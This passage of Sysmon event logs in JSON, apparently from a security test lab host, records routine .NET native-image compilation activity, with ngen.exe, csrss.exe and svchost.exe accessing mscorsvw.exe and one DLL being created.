08:05:54.132","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010AB850B00}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:54","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7630,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:54.132\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2231-5F25-0000-0010AB850B00}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:54.132","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2231-5F25-0000-0010AB850B00}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:54","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7631,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:54.147\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2262-5F25-0000-001064420E00}\r\nTargetProcessId: 2996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:54.147","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2262-5F25-0000-001064420E00}","TargetProcessId":"2996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7632,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:55.319\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001030050D00}\r\nTargetProcessId: 1804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:55.319","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001030050D00}","TargetProcessId":"1804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7633,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:55.319\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-224E-5F25-0000-001030050D00}\r\nTargetProcessId: 1804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:55.319","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-224E-5F25-0000-001030050D00}","TargetProcessId":"1804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:55","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7634,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:55.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2263-5F25-0000-0010154D0E00}\r\nTargetProcessId: 1804\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:55.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2263-5F25-0000-0010154D0E00}","TargetProcessId":"1804","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7635,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:05:56.741\r\nProcessGuid: {41C8662E-2263-5F25-0000-0010154D0E00}\r\nProcessId: 1804\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\70c-0\\System.Activities.Core.Presentation.dll\r\nCreationUtcTime: 2020-08-01 08:05:56.741","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:05:56.741","ProcessGuid":"{41C8662E-2263-5F25-0000-0010154D0E00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\70c-0\\System.Activities.Core.Presentation.dll","CreationUtcTime":"2020-08-01 08:05:56.741","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7636,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:56.804\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2264-5F25-0000-0010E2580E00}\r\nTargetProcessId: 4832\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:56.804","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2264-5F25-0000-0010E2580E00}","TargetProcessId":"4832","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7637,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:56.804\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2264-5F25-0000-0010E2580E00}\r\nTargetProcessId: 4832\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:56.804","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2264-5F25-0000-0010E2580E00}","TargetProcessId":"4832","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:56","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7638,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:56.819\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2264-5F25-0000-0010E2580E00}\r\nTargetProcessId: 4832\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: 